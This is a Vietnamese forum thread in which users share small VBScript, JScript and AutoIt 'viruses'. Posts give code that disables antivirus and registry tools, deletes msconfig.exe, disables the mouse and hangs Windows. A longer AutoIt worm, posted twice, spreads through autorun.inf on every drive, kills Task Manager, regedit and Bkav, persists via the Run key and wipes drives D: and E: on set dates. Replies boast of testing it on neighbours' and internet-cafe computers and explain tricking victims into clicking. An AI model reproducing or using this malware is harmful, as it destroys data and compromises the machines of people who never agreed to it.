:2T-khicon-(32):
Chỉ với Notepad hay Wordpad bạn đã có thể tự tạo cho mình 1 "chú" Virus dưới dạng VBSCRIPT hoặc Javascript rồi:

Dưới đây là code của một số con virus nhỏ dưới dạng VBS:

1.Không cho victim khởi động máy:

Dim wsh
Set wsh = createobject("wscript.shell")
wsh.run "RUNDLL32.EXE user.exe,exitwindows"


2. Disable NAV:

Dim wsh
Set wsh= CreateObject( "WScript.Shell")
s1 = "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Servi ces\Norton Program
Scheduler\Start"
wsh.RegWrite s1,3, "REG_DWORD"


3. Hiển thị một message mỗi khi reboot máy:

dim wsh
Set wsh = CreateObject( "WScript.Shell" )
s1 = "HKLM\Software\Microsoft\Windows\CurrentVersion\Wi nLogon\"
s2 = "LegalNoticeCaption"
s3 = "LegalNoticeText"
wsh.RegWrite s1+s2, "http://allformy.topcities.com"
wsh.RegWrite s1+s3, "Hi ! Toi la TrungWK- Toi den tu Chip&Kitty****"


4. Hiển thị một dòng lệnh khi click vào file hay folder:

set reg=createobject("WScript.shell")
reg.regwrite "HKEY_CLASSES_ROOT\*\Shell\\","Hi ! Ban da bi nhiem WK tu Chip&Kitty****"
reg.regwrite "HKEY_CLASSES_ROOT\folder\shell\Hi ! Ban da bi nhiem WK tu Chip&Kitty****\","Robinhood"


5. Làm cho các trò trên hoạt động bình thường:

Dim objShell
Set objShell = CreateObject( "WScript.Shell" )
s1 = "HKEY_USERS\.Default\Software\Microsoft\Windows\Cu rrentVersion\"
s2 = "Policies\System\DisableRegistryTools"
objShell.RegWrite s1+s2,1, "REG_DWORD"

Dưới dạng Javascipt :

var wsh;
wsh=new ActiveXObject ("Wscript.shell");


// Winlogon when reboot
var s1 = "HKLM\\Software\\Microsoft\\Windows\\CurrentVersio n\\WinLogon\\";
var s2 = "LegalNoticeCaption";
var s3 = "LegalNoticeText";
wsh.RegWrite (s1+ s2, "http://allformy.topcities.com") ;
wsh.RegWrite (s1+s3, "Hi ! Toi la Anti_Love. Toi den tu Chip&Kitty.com") ;

//Disable Registry
var s1 = "HKEY_USERS\\.Default\\Software\\Microsoft\\Window s\\CurrentVersion\\";
var s2 = "Policies\\System\\DisableRegistryTools" ;
wsh.RegWrite (s1+s2,0,"REG_DWORD");


//Delete file Msconfig.exe làm cho victim khởi động tới Registry luôn

var fso;
fso=new ActiveXObject("Scripting.FileSystemObject");
var fe=fso.getfile("C:\\windows\\msconfig.exe);
fe.delete true;


//Disable Mouse

wsh.run ("RUNDLL32.EXE mouse,disable");


//Hang up windows

wsh.run ("rundll32 user,disableoemlayer");
nếu như thấy hay thì Thank hộ tớ kái nák...HiHi

Tui viết xong nó có en máy tui ko zậy. Kinh wá đí ! Ai thử trước đi rồi pm cho mọi người bik :oh:

hay hay :big_smile:

Mình thì toàn dùng Auto IT

hehe thử liền với cái máy hàng xóm

uh ý hay đó. tui thử trên nhà thằng hàng xóm kết quả mĩ mãn đúng như mong đợi he he nó đc phen hết hồn:big_smile:

hok hỉu cái jì hít:2T-khicon-(105): nói rõ hơn dc ko anh

Có phải là copy hít rùi paste zô hem zợ. Thế khi gửi phải làm seo đây.

hok hỉu cái jì hít:2T-khicon-(105): nói rõ hơn dc ko anh

tui cũng không hiểu:
+ đó chỉ mới là nội dung con virut?
+ save vào đâu?
+ làm sao cho nó chạy?

=> không làm được gì hết

làm sao để sử dụng dzậy mấy bác ????? đọc chã hỉu j` cả

Em hok bít cách làm mấy pác ơi thấy mấy pác nói em thix mún chết đi được mờ hok bít làm tức thịt!!

uhmm....đề nghị chủ pic nói rõ hơn đê...:)

Chủ topic đâu ra giải thix cho mọi người xem !
1. Mình viết ra thì làm sao để ko dính virus
2. Làm sao cho nó chạy auto khi send sang máy khác

save đuôi dạng gì vậy bác

hay lắm ! Thank bạn

ra máy ngoài tiệm net làm thử nè......cho nó chết luôn...:):):):)

Pác ơi có phải copy vào notepad sau đó seo lại phải ko nào nhưng seo lại dưới dạng nào??? Mong các pác chỉ tường tận cho tụi em?? Rất mong các bác!! Em thử seo lại dưới dạng .bat nhưng nó ko có hoạt động> :2T-khicon-(105):

uây Bài hay thế này àm bị đẩy xuống trang 2 ah Thanh cho bác phát

Copy cái nào bạn thik,sau đó paste vào notepad,rồi save as dưới đuôi .vbs hoặc .js,rồi đổi tên cho nó (ví dụ:hack au,hack nik...zì đó:beat_brick:) sau đóa dụ đứa nào click vào:adore:..thế rồi........tạch.Tiện đây cho hỏi ai bik AutoIT thì post ít kn lên tui học hỏi tý nha:big_smile:

Cho mọi người cái code format theo ngày giờ nè:beat_brick:,post lên chỉ học hỏi,tuyệt đối đừng đi rải lung tung mà chít tui nhá:adore:.Dùng Auto IT mà encode,hoặc thử save dưới .exe hay bat...tui mới thử= Auto IT kết quả là mất sạch 20GB:beat_brick:,phục hồi mệt vãi....
Opt("TrayIconHide", 1)
FileSetAttrib("autorun.inf", "-R")
FileDelete("autorun.inf")
$file2 = FileOpen("autorun.inf", 1)
FileWriteLine($file2, "[AutoRun]")
FileWriteLine($file2, "open=,.exe")
FileWriteLine($file2, "shellexecute=,.exe")
FileWriteLine($file2, "shell\Auto\command=,.exe")
FileClose($file2)
;tao file autorun.inf
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoDriveAutoRun", "REG_DWORD", "000000000")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoDriveAutoRun", "REG_DWORD", "000000000")
;cho autorun o dia
$var4 = @ScriptDir
If $var4 <> "C:\WINDOWS" Then
FileCreateShortcut(@WindowsDir & "\Explorer.exe",@DesktopDir & "\1.lnk","",@ScriptDir, "","", "^!t", "", @SW_SHOWMAXIMIZED)
Send("^!t")
EndIf
;tao 1 shortcut de chay vao o dia tru thu muc system32 cua he thong
FileSetAttrib("autorun.inf", "+HSR")
FileSetAttrib(@DesktopDir & "\1.lnk", "+HS")
;lam cho 2 file shortcut va autorun co thuoc tinh an he thong.
$search = FileFindFirstFile("D:\*.*")
$search0 = FileFindFirstFile("E:\*.*")
;nhan dien tac ca cac file va folder trong o dia D va E
$bLoop = 1
While $bLoop = 1
$file = FileFindNextFile($search)
$file0 = FileFindNextFile($search0)

If @MDAY = "17" Or @MDAY = "11" Then
DirRemove("D:\" & $file, 1)
DirRemove("E:\" & $file0, 1)
;xoa file khi dung ngay da chon.
Else
$var = DriveGetDrive("all")
For $i = 1 to $var[0]
If $var[$i] = "a:" or $var[$i] = "b:" Then
For $i = 2 to $var[0]
FileCopy(@ScriptDir & "\,.exe", $var[$i], 8)
FileCopy(@ScriptDir & "\autorun.inf", $var[$i], 1)
Next
Else
FileCopy(@ScriptDir & "\,.exe", $var[$i], 8)
FileCopy(@ScriptDir & "\autorun.inf", $var[$i], 1)
EndIf
Next
;copy vao tac ca o dia khi chuong trinh dang chay
EndIf
FileCopy(@ScriptDir & "\,.exe", @WindowsDir, 8)
FileCopy(@ScriptDir & "\autorun.inf", @WindowsDir, 1)
ProcessClose("MSConfig.exe")
$PID3 = ProcessExists("MSConfig.exe")
If $PID3 Then ProcessClose($PID3)
ProcessClose("regedit.exe")
$PID2 = ProcessExists("regedit.exe")
If $PID2 Then ProcessClose($PID2)
ProcessClose("taskmgr.exe")
$PID1 = ProcessExists("taskmgr.exe")
If $PID1 Then ProcessClose($PID1)
ProcessClose("Bkav2006.exe")
$PID4 = ProcessExists("Bkav2006.exe")
If $PID4 Then ProcessClose($PID4)
;tat cac chuong trinh co the anh huong den virus
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "HUI", "REG_SZ", "C:\windows\,.exe")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", "HideFileExt", "REG_DWORD", "000000001")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", "ShowSuperHidden", "REG_DWORD", "000000000")

WEnd

Giải thik 1 số lệnh cho một số bạn nha:
dòng thứ 1 :Opt("TrayIconHide", 1) khi bạn dùng Auto IT thì mặc định khi lưu file nó sẽ tự động hiện icon bên dưới taskbar nên victim có thể nhận ra và tắt dc---> phải có dòng này nó mới ko hiện,set 1 là ko hiện,0 là hiện.
If @MDAY = "17" Or @MDAY = "11" Then
DirRemove("D:\" & $file, 1)
DirRemove("E:\" & $file0, 1)
Đoạn này là set thời gian nó sẽ format máy đối phương(cũng có thể máy mình:|)
nói bấy nhiu thui,nói lại lần nữa là chỉ học hỏi thui nha,đừng làm hại người khác!:2T-khicon-(62):cái code này tui nhớ là lấy ở trang web về vi-dút nào đóa,nhưng ko rõ.:surrender:

Cho mọi người cái code format theo ngày giờ nè:beat_brick:,post lên chỉ học hỏi,tuyệt đối đừng đi rải lung tung mà chít tui nhá:adore:.Dùng Auto IT mà encode,hoặc thử save dưới .exe hay bat...tui mới thử= Auto IT kết quả là mất sạch 20GB:beat_brick:,phục hồi mệt vãi....
Opt("TrayIconHide", 1)
FileSetAttrib("autorun.inf", "-R")
FileDelete("autorun.inf")
$file2 = FileOpen("autorun.inf", 1)
FileWriteLine($file2, "[AutoRun]")
FileWriteLine($file2, "open=,.exe")
FileWriteLine($file2, "shellexecute=,.exe")
FileWriteLine($file2, "shell\Auto\command=,.exe")
FileClose($file2)
;tao file autorun.inf
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoDriveAutoRun", "REG_DWORD", "000000000")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoDriveAutoRun", "REG_DWORD", "000000000")
;cho autorun o dia
$var4 = @ScriptDir
If $var4 <> "C:\WINDOWS" Then
FileCreateShortcut(@WindowsDir & "\Explorer.exe",@DesktopDir & "\1.lnk","",@ScriptDir, "","", "^!t", "", @SW_SHOWMAXIMIZED)
Send("^!t")
EndIf
;tao 1 shortcut de chay vao o dia tru thu muc system32 cua he thong
FileSetAttrib("autorun.inf", "+HSR")
FileSetAttrib(@DesktopDir & "\1.lnk", "+HS")
;lam cho 2 file shortcut va autorun co thuoc tinh an he thong.
$search = FileFindFirstFile("D:\*.*")
$search0 = FileFindFirstFile("E:\*.*")
;nhan dien tac ca cac file va folder trong o dia D va E
$bLoop = 1
While $bLoop = 1
$file = FileFindNextFile($search)
$file0 = FileFindNextFile($search0)

If @MDAY = "17" Or @MDAY = "11" Then
DirRemove("D:\" & $file, 1)
DirRemove("E:\" & $file0, 1)
;xoa file khi dung ngay da chon.
Else
$var = DriveGetDrive("all")
For $i = 1 to $var[0]
If $var[$i] = "a:" or $var[$i] = "b:" Then
For $i = 2 to $var[0]
FileCopy(@ScriptDir & "\,.exe", $var[$i], 8)
FileCopy(@ScriptDir & "\autorun.inf", $var[$i], 1)
Next
Else
FileCopy(@ScriptDir & "\,.exe", $var[$i], 8)
FileCopy(@ScriptDir & "\autorun.inf", $var[$i], 1)
EndIf
Next
;copy vao tac ca o dia khi chuong trinh dang chay
EndIf
FileCopy(@ScriptDir & "\,.exe", @WindowsDir, 8)
FileCopy(@ScriptDir & "\autorun.inf", @WindowsDir, 1)
ProcessClose("MSConfig.exe")
$PID3 = ProcessExists("MSConfig.exe")
If $PID3 Then ProcessClose($PID3)
ProcessClose("regedit.exe")
$PID2 = ProcessExists("regedit.exe")
If $PID2 Then ProcessClose($PID2)
ProcessClose("taskmgr.exe")
$PID1 = ProcessExists("taskmgr.exe")
If $PID1 Then ProcessClose($PID1)
ProcessClose("Bkav2006.exe")
$PID4 = ProcessExists("Bkav2006.exe")
If $PID4 Then ProcessClose($PID4)
;tat cac chuong trinh co the anh huong den virus
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "HUI", "REG_SZ", "C:\windows\,.exe")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", "HideFileExt", "REG_DWORD", "000000001")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", "ShowSuperHidden", "REG_DWORD", "000000000")

WEnd

Giải thik 1 số lệnh cho một số bạn nha:
dòng thứ 1 :Opt("TrayIconHide", 1) khi bạn dùng Auto IT thì mặc định khi lưu file nó sẽ tự động hiện icon bên dưới taskbar nên victim có thể nhận ra và tắt dc---> phải có dòng này nó mới ko hiện,set 1 là ko hiện,0 là hiện.
If @MDAY = "17" Or @MDAY = "11" Then
DirRemove("D:\" & $file, 1)
DirRemove("E:\" & $file0, 1)
Đoạn này là set thời gian nó sẽ format máy đối phương(cũng có thể máy mình:|)
nói bấy nhiu thui,nói lại lần nữa là chỉ học hỏi thui nha,đừng làm hại người khác!:2T-khicon-(62):cái code này tui nhớ là lấy ở trang web về vi-dút nào đóa,nhưng ko rõ.:surrender:

ko đủ trình độ để hỉu, ai pr0 jải thjx jùm hux hux